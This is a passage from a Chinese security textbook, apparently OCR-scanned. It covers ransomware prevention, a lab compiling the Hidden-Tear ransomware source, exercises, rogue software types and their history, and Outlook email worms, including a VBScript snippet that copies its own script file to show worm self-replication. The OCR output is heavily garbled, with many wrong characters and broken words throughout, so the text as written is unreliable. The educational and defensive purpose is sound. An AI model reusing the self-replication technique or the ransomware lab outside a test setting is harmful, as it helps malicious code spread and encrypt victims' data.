谨慎 处 理 邮 件 附 件 与 网 络 下 载 文件 ,增强 所 有 用 户 的 辨别 能 力 , 不 随意 下 载 不 可 信和 资 
源 , 不 打开 垃圾 邮件 和 可 疑 邮 件 ,不 轻信 社交 网 络 平台 上 的 链接 。 

留心 非 预期 的 电子 邮件 ,尤其 是 里 面包 含 链接 或 附件 的 情况 。 用 户 应 当 特 别 小 心 任何 
要 求 局 用 宏 以 查看 内 容 的 微软 办 公 软 件 , 除 非 完全 确定 这 是 来 日 于 可 信 源 的 真实 邮件 ,否则 
就 不 要 启用 宏 。 


8.5.2 备份 重要 文件 
在 应 对 未 知 的 安全 威胁 时 ,备份 是 唯一 有 效 的 方法 。 因 此 ,需要 确保 有 额外 的 备份 措施 
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或 离线 保存 方案 。 

大 部 分 情况 下 ,如 果 被 勒索 型 恶意 代码 感染 了 ,需要 通过 重 小 系统 或 刷机 才能 够 清除 。 
如 果 用 户 有 数据 备份 ,就 可 以 日 行 恢复 文件 ,这 样 的 情况 下 就 不 要 交 赎 金 了 。 很 显然 ,备份 
数据 的 存储 设备 的 防护 也 非常 重要 ,如果 设备 与 主机 存在 物理 连接 ,也 有 可 能 会 遭受 到 勒索 

型 恶意 代码 的 加 密 操 作 。 

企业 级 用 户 可 以 从 限制 最 重要 的 数据 访问 开始 ,然后 严格 监视 网 络 异常 ,只 要 发 现 异 
第 ,可 以 目 动 在 安全 的 位 置 创建 文件 备份 。 

不 仅 要 注意 备份 ,而 且 要 测试 备份 恢复 能 力 , 保 证 备份 数据 和 备份 恢复 软件 的 可 用 性 同 


8.5.3 网 络 流量 的 检测 


如 果 勒 索 型 恶意 代码 通过 加 密 的 Web 服务 传播 ,就 能 够 绕 过 传统 的 防护 手段 。 因 此 必 
须 采 取 支 持 SSL 监测 的 防护 手段 ,检测 SSL 加 密会 话 中 存在 的 威胁 。 


8.5.4 网 络 隔离 措施 


勒索 型 恶意 代码 稼 党 通过 局 域 网 散播 ,企业 应 当 提 升 网 络 隅 离 的 措施 ,将 关键 业务 程 
序数 据 和 设备 隔离 在 独立 网 络 中 ,有 助 于 防止 来 日 于 网 络 的 感染 。 

是 虫 式 的 传播 能 力 是 当前 勒索 型 恶意 代码 的 典型 特征 ,而 且 传播 能 力 极 强 。 巾 于 勒索 
型 恶意 代码 已 经 可 以 在 局 域 网 内 蠕虫 式 传播 ,因此 ,为 了 防止 勒索 型 恶意 代码 的 扩散 ,应 该 
采取 有 效 的 网 络 隔离 措施 ,将 关键 的 业务 服务 程序 .数据 和 设备 隅 离 到 独立 的 网 络 中 ,防止 
来 自 网 络 的 感染 。 


8.5.5 更 新 软件 和 安 效 补丁 


由 于 勒索 型 恶意 代码 在 传播 阶段 基本 都 是 利用 了 系统 或 软件 的 漏洞 ,因此 ,漏洞 是 勒索 
型 恶意 代码 的 传播 土壤 ,杜绝 了 漏洞 就 能 防止 勒索 病毒 的 传播 。 正 是 基于 此 ,建议 用 户 及 时 
更 新 系统 中 的 各 种 应 用 软件 , 安 狼 系统 的 最 新 补丁 。 


8.6 综合 实验 
综合 实验 九 : 勒索 型 恶意 代码 实验 


【实验 目的 】 

(1) 车 握 勒 索 型 恶意 代码 的 基本 原理 。 

(2) 学 习 Hidden-Tear 恶意 代码 源 代码 ,掌握 其 中 的 关键 模块 。 
【实验 环境 】 

(1) Windows 10 操作 系统 。 

(2) Visual Studio 2012 编程 环境 。 

【实验 步骤 了】 

(1) 在 编程 环境 中 ,对 Hidden-Tear 源 代 码 进行 编译 。 
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(2) 熟悉 AES 加 密 的 原理 ,并 阅读 Hidden-Tear 恶意 代码 的 AES 加 密 模 块 的 源 代 码 。 
在 掌握 改 源 代码 的 基础 上 ,进行 文件 加 解密 的 尝试 。 

【实验 注意 事项 】 

Hidden-Tear 恶意 代码 能 够 实现 对 测试 环境 的 加 密 。 在 测试 过 程 中 注意 如 下 事项 。 

(1) 不 在 实际 环境 下 测试 ,防止 丢失 真实 文件 或 数据 。 

(2) 擎 握 了 解密 代码 后 再 开始 测试 。 

(3) 开始 测试 时 ,备份 测试 文件 。 


从 传统 计算 机 病毒 . 晴 虫 .网 络 钓鱼 .间谍 软件 .特洛伊 木马 ,到 现在 的 DDoS( 分 布 式 拒 
绝 服 务 ) 攻 击 、.APT( 高 级 可 持续 攻击 ) 和 勒索 型 恶意 代码 ,攻击 者 正 把 目光 从 人 退 求 纯 技术 转 
移 到 获取 经 济 利益 上 来 ,这 就 使 用 户 面 临 经 济 损失 和 信息 失 魏 的 巨大 风险 。 网 络 攻 击 技术 、 
社会 工程 学 和 网 络 经 济 学 等 各 种 攻击 手段 ,现在 部 在 被 攻击 者 综合 利用 。 

本 节 主 要 是 帮助 读者 对 勒索 型 恶意 代码 有 个 全 面 的 认识 。 勒 案 型 恶意 代码 主要 通过 加 
密 受 害 者 数据 文件 或 设备 来 达到 勒索 .获取 经 济 利益 的 目的 。 在 勒索 病毒 刚 起 步 的 时 候 , 通 
币 有 很 多 漏洞 ,譬如 私 钥 使 用 明文 保存 在 本 地 、 加密 算法 可 破解 等 。 然 而 , 随 大 近 年 来 勒索 
型 恶意 代码 的 高 速 发 展 ,其 加 密 通常 不 存在 漏洞 ,也 就 是 说 ,受害 者 基本 上 只 能 依 罪 交 赎 金 
来 恢复 数据 。 

因此 ,在 平时 的 生活 工作 中 加 强 勒 案 型 恶意 代码 防范 ,增强 危机 意识 才 是 最 好 的 避免 
遭受 勒 案 型 恶意 代码 的 方法 。 对 于 企业 而 言 ,除了 必要 的 网 络 阳 离 、 备 份 数 据 、 只 开放 必 
要 端口 ,漏洞 防护 等 保障 措施 ,还 应 对 企业 员工 进行 定期 计算 机 安全 教育 ,增强 员工 计算 
机 安全 规范 ,从 而 封 堵 勒 索 型 恶意 代码 可 乘 之 机 。 就 个 人 而 言 , 定 期 备份 数据 ,加强 口令 
强度 ,不 随便 打开 网 页 .邮件 等 渠道 的 链接 或 文件 ,都 能 极 大 降低 遭遇 勒索 型 恶意 代码 的 
风险。 

勒 案 型 恶意 代码 已 成 为 一 条 高 度 发 展 \、 经 济 利益 巨大 的 地 下 畸 客 产业 生产 链 , 作 为 信息 
安全 工作 者 ,更 加 需要 对 勒 案 型 恶意 代码 进行 深入 的 分 析 , 从 而 加 强 防范 技术 ,还 计算 机 网 
络 一 片 度 天 辊 坤 。 


8.8 习 古 
一 、 填 空 题 
1. 勒索 型 恶意 代码 是 一 种 以 为 日 的 的 恶意 软件 一 一 黑客 使 用 技术 手段 动 
拼 或 ,并 以 此 为 条 件 向 用 户 勒 索 钱 财 的 一 种 恶意 攻击 手段 。 
2. 勒索 型 恶意 代码 有 两 种 形式 ,分 别 是 和 
二 、 选 择 题 


1. 从 技术 上 讲 ,勒索 型 恶意 代码 包括 的 模块 有 (  ) 模 块 。 
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A. 补丁 下 载 B. 勒索 
C. 蠕虫 D. 漏洞 利用 
2. 勒索 型 恶意 代码 常用 的 加 密 算 法 包括 ( ) 。 
A. 自 定义 加 密 算 法 B. 对 称 加 密 算法 
C. 对 称 - 非 对 称 加 密 算法 D. 非 对 称 加 密 算 法 


1. 什么 是 勒索 型 恶意 代码 ? 
2. 举例 说 明 一 款 勒 索 型 恶意 代码 的 攻击 方式 。 
3. 试 论 述 防 范 勒 索 型 恶意 代码 的 措施 (要 求 措施 和 攻击 手段 对 应 阐述 ) 。 
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当前 ,感染 可 执行 文件 ,数据 文件 和 引导 区 的 恶意 代码 已 经 是 过 去 时 ,蠕虫 、 特 洛 伊 木 
马 、 网 络 僵尸 和 Rootkit 才 是 恶意 代码 的 进行 时 。 其 中 ,DDos( 一 般 由 僵尸 网 络 作为 攻击 手 
段 ,因此 经 常 被 等 价 为 僵尸 网 络 ) 和 APT 是 安全 领域 公认 的 最 难 对 付 的 两 个 攻击 方式 。 鉴 


于 此 ,本 革 重 点 探讨 一 些 采 用 特殊 技术 编制 的 新 型 恶意 代码 ,以 使 读者 了 解 最 流行 的 恶意 
代码 。 
本 章 学 习 目 标 


(1) 了 解 流氓 软件 和 Rootkit 恶意 代码 。 

(2) 掌握 网 络 僵尸 的 基本 原理 。 

(3) 掌握 Outlook 漏洞 的 恶意 代码 。 

(4) 掌握 WebPage 恶意 代码 。 

(5) 了 解 APT(Advanced Persistent Threat) 的 基本 原理 。 


9.1 流氓 软件 


“ 流 谍 软 件 ” 是 一 个 新 生 的 词汇 , 它 源 日 网 络 。 近 年 来 ,一 些 “ 流 谍 软 件 ” 引 起 了 用 户 和 媒 
体 的 强烈 关注 。 它 们 往往 采用 特殊 手段 频 蚂 弹出 广告 窗口 ,危及 用 户 隐私 ,严重 干扰 用 户 的 
日 常 工 作 、 数 据 安全 和 个 人 隐私 。 这 些 软件 在 计算 机 用 户 中 引起 了 公愤 ,许多 人 指责 它们 为 
“彻头彻尾 的 流 谍 软 件 ”。 流 谍 软 件 的 泛滥 ,成 为 因特网 安全 的 新 威胁 。 


9.1.1 流氓 软 件 的 定义 


迄今 为 止 ,流氓 软件 还 没有 一 个 被 大 家 公认 的 统一 定义 。 中 国 反 流氓 软件 联盟 和 奇 虎 
360 公司 都 试图 统一 流氓 软件 的 定义 ,但 都 没有 成 功 。 

第 一 个 定义 : 流氓 软件 是 指 具 有 一 定 的 实用 价值 但 具备 计算 机 恶意 代码 和 黑客 的 部 分 
行为 特征 的 软件 。 它 处 在 合法 软件 和 恶意 代码 之 间 的 灰色 地 带 ,使 用 户 无 法 秃 载 , 并 强行 弹 
出 广告 和 窃取 用 户 的 私人 信息 等 。 

第 二 个 定义 : 流氓 软件 是 介 于 恶意 代码 和 正规 软件 之 间 , 同 时 具备 正常 功能 (下 载 、 媒 
体 播放 等 ) 和 恶意 行为 ( 弹 广 告 . 开 后 门 ) 的 软件 ,给 用 户 带 来 实质 危害 。 

总 之 , 流 谍 软件 是 对 网 络 上 散播 的 符合 如 下 条 件 的 软件 的 一 种 称呼 。 

(1) 采用 多 种 社会 和 技术 手段 ,强行 或 者 秘密 安装 ,并 抵制 印 载 。 

(2) 强行 修改 软件 设置 ,如 浏览 器 主页 .软件 自动 启动 选项 及 安全 选项 等 。 

(3) 强行 弹出 广告 ,或 者 其 他 干扰 用 户 、 占 用 系统 资源 行为 。 

(4) 有 侵害 用 户 信 息 和 财产 安全 的 潜在 因素 或 者 隐患 。 

(5) 未 经 许可 ,或 者 利用 用 户 玻 忽 或 缺乏 相关 知识 ,秘密 收集 用 户 个 人 信息 、 秘 密 和 隐私 。 
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9.1.2 应 对 流氓 软件 的 政策 


流氓 软件 已 经 成 为 世界 各 国共 同 关 注 的 焦点 ,国外 监管 制度 相对 较为 完善 。2004 年 ， 
美国 犹他 州 通 过 了 第 一 个 针对 间谍 软件 的 立法 Spyware Control Act ,此 后 又 有 18 个 州 完 
成 了 此 项 立法 。 我 国 现 阶 段 仍 然 缺 乏 完 善 的 法 律 和 政策 。 监 管 政 策 缺 失 、 商 业 利益 驱动 及 
网 民 防 范 意 识 淡 清 等 成 为 流氓 软件 猩 狐 的 主要 原因 。 

我 国 积 极 开 展 治理 流氓 软件 活动 。 北 京 市 网 络 行业 协会 于 2005 年 6 月 召开 了 首次 防 
治 流 氓 软件 的 研讨 会 。 新 浪 搜狐、 网 易 .瑞星 、 江 民 等 16 家 企业 会 后 起 草 了 《软件 产品 行为 
安全 目 律 公约 》。2006 年 9 月 4 日 ,一 个 非 营 利 性 的 专门 打击 流 谍 软 件 的 民间 组 织 中 
国 反 流 谍 软件 联盟 成 立 。 

自 2006 年 以 来 ,网 民 、 媒 体 、 信 息 安全 厂商 主管 部 门 和 行业 协会 等 纷纷 采取 措施 打击 
日 益 狙 狐 的 流氓 软件 一 一 以 反 流 氓 软件 联盟 为 代表 的 网 民 起 诉 相 关 企 业 、 信 息 安 全 厂商 对 
流 谍 软 件 进行 查 杀 .行业 协会 倡导 行业 自律 \ 信 息 产业 部 公布 举报 电话 接受 投诉 及 媒体 频繁 
曝光 等 。 此 外 ,国家 已 开始 把 对 流 谍 软 件 的 检测 纳入 到 杀毒 软件 的 检测 标准 之 中 。 在 各 方 
力量 强大 的 打击 下 ,部 分 流 诺 软 件 生产 者 开始 放弃 或 减少 流 谍 软 件 的 制作 和 传播 , 流 谍 软 件 
的 侵扰 行为 也 有 所 收敛 。 
9.1.3 流 谍 软件 的 主要 特征 

以 创作 者 而 言 , 流 谍 软件 与 恶意 代码 或 者 蠕虫 不 同 。 大 多 数 恶 意 代 码 是 由 小 团体 或 者 
个 人 秘密 编写 和 散播 的 ; 而 流 谍 软 件 则 涉及 很 多 知名 企业 和 团体 。 流 谍 软 件 可 能 造成 计算 
机 运行 变 慢 浏览 带 异 常 等。 多 数 流 谍 软 件 具 有 以 下 特征 。 

1. 强迫 性 安装 

(1) 不 经 用 户 许 可 自动 安装 。 

(2) 不 给 出 明显 提示 ,欺骗 用 户 安装 。 

(3) 反复 提示 安装 ,使 用 户 不 胜 其 烦 而 不 得 不 安装 等 。 

2. 无 法 卸载 或 印 载 困难 

(1) 正常 手段 无 法 印 载 。 

(2) 无 法 完全 凶 载 。 

(3) 不 提供 印 载 程序 ,或 者 提供 的 印 载 程序 不 能 用 等 。 

3. 干扰 正常 使 用 

(1) 频繁 弹出 广告 窗 口 。 

(2) 引导 使 用 某 功 能 等 。 

4. 具有 恶意 代码 和 黑客 特征 

(1) 完 取 信息 。 

(2) 耗费 计算 机 资源 等 。 


9.1.4 流 误 软件 的 发 展 过 程 


中 国 流 谍 软件 的 发 展 在 经 历 了 有 恶意 网 页 代码 和 插件 时 代 后 ,有 了 进一步 发 展 : 反 浏 览 
大 支持、 反 恶 意 插 件 和 广告 过 滤 等 工具 依次 出 现 , 这 进一步 强化 了 流 谍 软件 功能 及 推广 方 
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式 。2005 年 流 谍 软 件 开始 利用 共享 软件 进行 推广 ,2006 年 开始 呈现 病毒 化 的 发 展 趋势 , 恶 
劣 行为 变本加厉 ,严重 干扰 了 网 民 的 正常 使 用 ,损害 网 民 的 合法 权益 。 

1. 恶意 网 页 代码 时 代 (2001 一 2002 年 ) 

目 2001 年 开始 , 某 些 黄 色 网 站 和 中 小 型 网 站 通过 修改 浏览 融 主 页 的 方法 提高 网 站 访问 
量 。 它 们 在 其 网 站 页 面 中 放置 一 段 恶 意 代码 , 当 用 户 浏 览 这 些 网 站 时 , 了 正 浏 览 硕 主页 会 被 
修改 。 当 下 次 打开 浏览 器 时 会 首先 打开 这 些 网 站 ,从 而 提高 其 访问 量 , 这 一 做 法 在 当时 非常 
流行 。 由 于 修改 浏览 带 主 页 只 是 对 IE 浏览 带 进 行人 简单 的 设置 ,用 户 可 以 将 首页 重新 改 回 
来 ,因此 这 种 方法 并 没有 完全 实现 这 些 不 良 网 站 的 推广 企图 。 

随后 ,不 少 中 小 型 网 站 开始 采用 更 加 恶意 的 方法 。 它 们 通过 恶意 网 页 代码 直接 对 计算 
机 的 注册 表 进 行 修改 ,对 一 些 系统 功能 进行 限制 。“ 万 花 谷 ” 病 毒 就 是 典型 的 代表 。 和 针对 这 
一 情况 ,杀毒 软件 公司 人 研发 的 网 页 监控 和 注册 表 监 控 两 大 技术 从 根本 上 解决 了 此 类 问题 。 
这 类 恶意 网 页 代码 方式 渐渐 失去 了 生存 空间 。 

2. 插件 时 代 (2003 一 2005 年 ) 

从 2003 年 开始 ,中 国 互联 网 出 现 了 一 种 称 为 “网 络 实 名 ”( 也 称 为 “中 文 上 网 ”) 的 新 业务 
形式 。 网 络 实名 的 作用 是 将 中 文 解析 成 对 应 的 网 址 ,使 用 户 输入 中 文 的 公司 或 网 站 名 称 时 
能 够 打开 它们 的 网 站 。 

要 想 将 中 文 解析 成 网 址 ,需要 在 用 户 的 计算 机 上 安 流 一 个 插件 程序 。 因 此 ,网 络 实名 要 
想 提 升 其 品牌 价值 ,就 必须 将 插件 安装 到 更 多 的 计算 机 上 ,占领 尽 可 能 多 的 客户 端 。 网 络 实 
名 通过 与 大 量 的 网 站 进行 合作 ,放置 其 插件 程序 , 当 用 户 访问 这 些 网 站 时 就 会 被 月 动 安 疲 上 
网 络 实名 插件 ,并 且 无 法 印 载 。 

由 于 网 络 实名 取得 了 巨大 的 经 济 收益 ,促使 其 他 的 厂商 也 推出 了 具有 同 质 化 功能 的 插 
件 程序 。 为 了 争夺 市 场 ,提供 网 络 实 名 业务 的 公司 之 间 开 始 “ 互 杀 ”, 软 件 安 疲 后 会 试图 删除 
苑 争 对 手 的 插件 ,将 用 户 的 计算 机 变 成 “战场 ”, 其 至 一 些 厂商 为 此 对 簿 公 答 。 由 于 插件 间 的 
恶性 苋 争 , 在 “ 互 杀 ”的 过 程 中 往往 造成 用 户 计算 机 频繁 死机 和 蓝屏 等 不 正常 症状 。 

到 了 2005 年 年 初 , 越 来 越 多 的 国内 因特网 厂商 从 网 络 实名 厂商 间 的 竞争 中 认识 到 插件 
推广 的 绝 佳 效果 ,于 是 纷纷 推出 目 己 的 插件 。 这 使 得 用 户 在 浏览 一 些 网 站 时 ,和 凋 篆 被 安 疫 了 
无 数 个 插件 和 工具 条 软件 。 随 看 这 种 情况 愈演愈烈 ,用 户 开 始 控 诉 此 类 插件 ,并 形象 地 将 这 
些 不 请 有 自 来 的 软件 称 为 “ 流 谍 软 件 ”。 

3. 软件 捆绑 时 代 (2005 年 至 今 ) 


随 看 反 流 谍 软 件 工 具 的 推出 , 流 谍 软件 厂商 遭受 到 了 沉重 的 打击 。 一 些 因 特 网 厂商 被 
迫 寻 找 新 的 推广 方式 ,于 是 他 们 开始 符 试 用 共 副 软件 搁 绑 的 方式 ,四 用 户 的 计算 机 中 安插 流 
诺 软 件 。 这 些 厂商 网 罗 了 多 种 知名 共享 软件 的 作者 ,将 目 喘 的 产品 与 共享 软件 捆绑 ,并 文 付 
一 定 费用 。 当 安装 这 些 共 享 软件 时 ,会 同时 被 蝇 制 安 痛 流氓 软件 , 且 无 法 秋 载 。 

由 于 中 国 的 共享 软件 体制 尚 不 完善 ,盗版 问题 仍然 比较 严重 ,很 多 共享 软件 刚刚 推出 即 
遭 到 破解 。 共 享 软件 作者 很 难 从 软件 注册 费 中 获取 收益 ,因此 纷纷 通过 推广 流氓 软件 来 牟 
利 。 这 一 时 期 曾经 出 现 过 一 个 共享 软件 拥 绑 安装 十 余 个 流氓 软件 的 情况 。 另 一 方面 ,有 的 
消费 类 厂商 由 于 通过 流 谍 软 件 弹出 广告 覆盖 面 广 、 营 销 对 象 确 定 及 利润 来 源 稳定 ,也 开始 给 
流 谍 软件 发 布 者 投放 广告 ,这 使 得 整个 流 谍 软 件 产 业 形 成 了 完整 的 链条 。 
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流 谍 软 件 处 于 病毒 与 正规 软件 中 间 的 灰色 地 带 。 它 们 虽然 带 有 强制 安装 、 弹 出 广告 无 
法 印 载 等 恶意 特征 ,但 也 同时 具有 用 户 需 要 的 一 些 正 常 软 件 功 能 。 因 此 ,很 难 将 其 定义 为 病 
毒 。 由 于 我 国 还 没有 针对 流氓 软件 的 相关 法 律 法 规 出 台 , 反 病毒 公司 只 能 以 发 布 自律 书 、 规 
范 软件 编写 的 形式 来 呼吁 业界 和 目 觉 对 流 妃 软件 行为 进行 抵制 。 这 种 情况 虽然 给 流 谍 软件 广 
商 带 来 了 一 定 的 压力 ,但 是 并 未 从 根本 上 彻底 解决 流 诺 软件 问题 ,而 由 于 利益 驱动 , 越 来 越 
多 的 厂商 开始 通过 流 谍 软 件 推广 产品 和 网 站 ,甚至 通过 占领 用 户 的 计算 机 来 弹出 广告 业务 。 

4. 流氓 软件 病毒 化 时 代 (2006 年 下 半年 至 今 ) 

迫 于 技术 和 熏 论 的 压力 ,制作 流 误 软件 的 厂商 开始 两 极 分 化 。 一 些 大 牌 因 特 网 厂商 逐 
渐 将 软件 的 恶意 程度 降低 ,还 有 一 些 厂商 干脆 放弃 推广 流氓 软 件 。 然 而 , 仍 有 大 量 的 中 小 三 
商 是 通过 流 谍 软 件 起 家 的 ,通过 流氓 软 件 进行 广告 推广 已 经 成 为 其 公司 的 主要 甚至 是 唯一 
的 收入 来 源 。 从 2006 年 下 半年 开始 ,一些 广 商 为 了 生存 ,不 展 狼 而 走 险 ,使 用 更 加 卑劣 的 手 
段 进 行 流氓 软件 的 推广 ,并 且 采 用 更 加 恶毒 的 技术 公然 向 反 病 毒 软件 、 反 流氓 软件 工具 挑 
战 。 据 瑞星 公司 客户 服务 中 心 的 统计 数据 表明 ,从 2006 年 6 月 开始 ,用 户 计 算 机 申 于 流 谍 
软件 问题 导致 月 演 的 求助 数量 已 经 超过 了 病毒 。 这 一 时 期 的 流氓 软件 有 以 下 两 大 特点 。 

(1) 编写 病毒 化 。 不 少 流氓 软件 为 了 防止 被 杀毒 软件 或 流氓 软件 印 载 工具 发 现 , 采 用 
了 病毒 常用 的 Rootkit 技术 进行 自我 保护 。Rootkit 可 以 对 自身 及 指定 的 文件 进行 隐藏 或 
锁定 ,防止 被 发 现 和 删除 。 更 有 一 些 流 谍 软 件 采 用 日 杀 式 技术 攻击 杀毒 软件 。 一 旦 发 现 用 
户 安装 或 运行 杀毒 软件 , 便 运 行 恶 意 代码 ,直接 造成 计算 机 死机 、 蓝 屏 , 让 用 户 误 以 为 是 杀毒 
软件 存在 问题 。 

(2) 传播 病毒 化 。 为 了 达到 更 好 的 传播 效果 ,并 减少 成 本 ,不 少 中 小 厂商 直接 使 用 病毒 
进行 流氓 软件 的 推广 。 用户 的 计算 机 感染 病毒 后 ,病毒 会 自动 在 后 台 运 行 ,下载 并 安装 流 谍 
软件 。 同 时 , 流 谍 软件 安装 后 也 会 从 因特网 上 自动 下 载 并 运行 病毒 。 


9.1.5 流氓 软件 的 分 类 


根据 不 同 的 特征 和 和 危害 ,困扰 广大 计算 机 用 户 的 流氓 软件 的 主要 类 型 如 下 。 

1. 广告 软件 

广告 软件 (Adware) 是 指 未 经 用 户 允 许 , 下 载 并 安装 在 用 户 计算 机 上 ,或 者 与 其 他 软件 
捆绑 ,通过 弹出 式 广告 等 形式 牟取 商业 利益 的 程序 。 此 类 软件 安装 后 ,在 后 台 收 集 用 户 信 息 
牟利 ,危及 用 户 隐私 ; 或 频繁 弹出 广告 .消耗 系统 资源 、 使 系统 运行 变 慢 ,干扰 用 户 正 常 使 用 。 
安 狼 了 某 下 载 软件 后 ,会 一 耳 弹 出 市 有 广告 内 容 的 窗口 ,干扰 正常 使 用 。 还 有 一 些 软 件 安 沪 
后 ,会 在 下 浏览 融 的 工具 栏 位 置 添加 与 其 功能 不 相干 的 广告 图 标 , 普 通用 户 很 难 将 其 清除 。 

2. 间谍 软件 

间谍 软件 (Spyware) 是 一 种 能 够 在 用 户 不 知情 的 情况 下 ,在 其 计算 机 上 安装 后 门 程序 、 
收集 用 户 信息 的 软件 。 用 户 的 隐私 数据 和 重要 信息 会 被 后 门 程序 捕获 ,并 被 发 送 给 黑客 和 
商业 公司 等 。 这 些 后 门 程序 甚至 能 使 用 户 的 计算 机 被 远程 操控 ,组 成 庞大 的 僵尸 网 络 , 这 是 
目前 网 络 安全 的 重要 隐患 之 一 。 

3. 浏览 器 支持 

浏览 器 劫持 是 一 种 恶意 程序 ,通过 浏览 大 插件 `.BHO( 浏 览 器 辅助 对 象 ) 及 WinSock 
LSP 等 形式 对 浏览 器 进行 算 改 ,使 浏览 器 配置 不 正常 ,被 强行 引导 到 商业 网 站 。 用 户 在 浏 
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览 网 站 时 会 被 强行 安装 此 类 插件 ,普通 用 户 根 本 无 法 将 其 印 载 ,被 劫持 后 ,只 要 上 网 就 会 被 
强行 引导 到 其 指定 的 网 站 ,严重 影响 正常 上 网 浏览 。 一 些 不 恨 站 点 会 频繁 弹出 安 靶 窗口 , 迫 
使 用 户 安装 某 浏 览 硕 插件 ,甚至 根本 不 征求 用 户 意见 ,利用 系统 漏洞 在 后 台 强 制 安装 到 计算 
机 中 。 这 种 插件 还 采用 了 不 规范 的 软件 编写 技术 (此 技术 通常 被 病毒 使 用 ) 来 逃避 凶 载 , 往 
往 会 造成 浏览 器 错误 、 系 统 异 常 重启 等 。 

4. 行为 记录 软件 

行为 记录 软件 (Track Ware) 是 指 未 经 用 户 许 可 , 禄 取 并 分 析 用 户 隐私 数据 ,记录 用 户 
计算 机 使 用 习惯 、 网 络 浏览 习惯 等 个 人 行为 的 软件 。 行 为 记录 软件 危及 用 户 隐 私 , 可 能 被 黑 
客 利 用 进行 网 络 诈骗 。 一 些 软 件 会 在 后 台 记 录用 户 访问 过 的 网 站 并 加 以 分 析 , 有 的 甚至 会 
发 送 给 专门 的 商业 公司 或 机 构 , 此 类 机 构 会 据 此 突 测 用 户 的 爱好 ,并 进行 相应 的 广告 推广 或 
商业 活动 。 

S$. 恶意 共享 软件 

恶意 共享 软件 (Malicious Shareware) 是 指 某 些 共 享 软件 为 了 获取 利益 ,采用 衣 骗 手段 、 
试用 陷阱 等 方式 强迫 用 户 注册 ,或 者 在 软件 体内 捆绑 各 类 恶意 插件 ,未 经 允许 即将 其 安装 到 
计算 机 中 。 恶 意 共享 软件 使 用 试用 陷阱 强迫 用 户 进行 注册 ,否则 可 能 会 丢失 个 人 资料 等 数 
据 。 软 件 集 成 的 插件 可 能 会 造成 浏览 硕 被 劫持 、 隐 私 被 禄 取 等 。 例 如 ,安装 某 蒜 媒体 播放 软 
件 后 ,会 被 强迫 安放 与 播放 功能 刘 不 相干 的 软件 (搜索 插件 .下载 软 件 ) 却 不 给 出 明确 提示 ， 
并 且 弛 载 播放 兹 软件 时 不 会 日 动 凶 载 这 些 附加 安 半 的 软件 。 


9.2 利用 Outlook 漏洞 的 恶意 代码 


随 春 Internet 的 迅猛 发 展 , 电 子 邮 件 已 经 成 为 人 们 相互 交流 最 党 使 用 的 工具 ,因此 它 也 
成 为 新 型 恶意 代码 一 一 电子 邮件 型 恶意 代码 的 重要 载体 。 最 近 两 年 ,出 现 了 许多 危害 极 大 
的 邮件 型 恶意 代码 ,如 " 爱 虫 (I Love You)”“ 美 丽水 (Melissa)” 库 尔 尼 科 娃 ”“ 主 页 
(HomePage)” 和 “欢乐 时 光 (HappyTime)” 等 。 这 些 有 恶意 代码 主要 通过 Outlook 的 可 编程 
特性 实现 。 在 收 件 人 使 用 Outlook 打开 邮件 或 附件 时 ,里 面 的 恶意 代码 就 会 目 动 激活 并 回 
通讯 录 中 的 所 有 人 发 送 斋 恶意 代码 的 邮件 (恶意 代码 附 在 附件 或 邮件 体内 ), 从 而 导致 恶意 
代码 的 大 规模 迅速 传播 ,最 终 导 致 邮件 服务 费 耗 尽 资源 而 瘫痪 。 


9.2.1 邮件 型 恶意 代码 的 传播 方式 


由 于 Outlook 对 恶意 代码 的 传播 能 力 特别 强 , 因 此 ,业界 戏称 “在 现 有 恶意 代码 中 , 口 蹄 
疫 是 唯一 不 能 通过 Outlook 传播 的 一 种 病毒 ”。 根 据 恶意 代 码 和 邮件 结合 方式 不 同 , 可 以 将 
恶意 代码 分 为 如 下 几 类 。 

1. 附件 方式 

恶意 代码 的 主要 部 分 就 隐藏 在 附件 中 。 巾 于 这 种 方式 简单 易 行 ,大 多 数 电子 邮件 型 恶 
意 代码 都 采用 这 种 方式 。 例 如 ,主页 >”(HomePage) 和 “* 爱 虫 >(I Love You) ,它们 的 附件 是 
VBS 文件 ,也 就 是 恶意 代码 的 关键 部 分 。 

2. 邮件 本 身 

恶意 代码 并 不 置身 于 附件 ,而 是 藏身 于 邮件 体 之 中 。 该 类 型 的 恶意 代码 隐蔽 性 更 强 。 
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例如 ,著名 的 “欢乐 时 光 ”(HappyTime) 就 藏身 于 邮件 体 中 ,一旦 用 户 移动 鼠标 指针 至 融 病 
毒 的 邮件 上 ,还 未 阅读 邮件 计算 机 就 已 经 感染 病毒 了 。 

3. 藤 入 方式 

恶意 代码 仅仅 把 电子 邮件 作为 其 传播 手段 。 例 如 , “美丽 沙 ”(Melissa) 是 一 种 隐 菩 性 、 
传播 性 极 大 的 Word 97/Word 2000 宏 病 毒 。 尽 管 其 核心 内 容 是 宏 病 毒 ,但 在 其 体内 有 一 段 
代码 专门 用 来 传播 。 当 条 件 符合 时 ,打开 电子 邮件 地 址 ,向 前 50 个 地 址 发 送 被 感染 的 邮件 。 


9.2.2 邮件 型 恶意 代码 的 传播 原理 


Outlook 的 编程 简单 化 .与 脚本 的 高 度 集 成 及 结构 复杂 等 特性 被 病毒 编制 者 轻松 利用 ， 
导致 其 成 为 恶意 代码 的 传播 途径 。 恶 意 代 码 要 想 传播 必须 将 自身 复制 并 借助 其 他 邮件 或 本 
上 身 发 送出 去 ,Outlook 传播 的 恶意 代码 基本 上 都 是 由 VBScript 编写 的 ,其 自我 复制 的 原理 
基本 上 是 利用 程序 将 本 身 的 脚本 内 容 复 制 一 份 到 一 个 临时 文件 ,然后 在 传播 的 环节 将 其 作 
为 附件 发 送出 去 。 下 面 看 看 脚本 是 怎么 样 完 成 这 个 功能 的 。 


Setfso = CreateObject("Scripting.FileSystemObject") 
fso. GetFile(WScript. ScriptFullName). Copy("C:\temp. vbs") 


这 两 行 代码 就 可 以 将 自身 复制 到 C 盘 根 目录 下 的 temp. vbs 文件 。 第 一 行 是 创建 一 个 
文件 系统 对 象 ,第 二 行 前 面 是 打开 这 个 脚本 文件 ,WScript. ScriptFullName 指明 是 这 个 程序 
本 身 ,是 一 个 完整 的 路 径 文件 名 。GetFile 函数 获得 这 个 文件 ,Copy 函数 将 这 个 文件 复制 到 
C 盘 根 目 录 下 的 temp. vbs 文件 。 这 就 是 大 多 数 恶 意 代码 制作 者 利用 VBScript 编写 恶意 代 
码 的 一 个 特点 。 从 这 里 可 以 看 出 ,禁止 了 FileSystemObject 这 个 对 象 就 可 以 很 有 效 地 控制 
这 种 恶意 代码 的 传播 。 


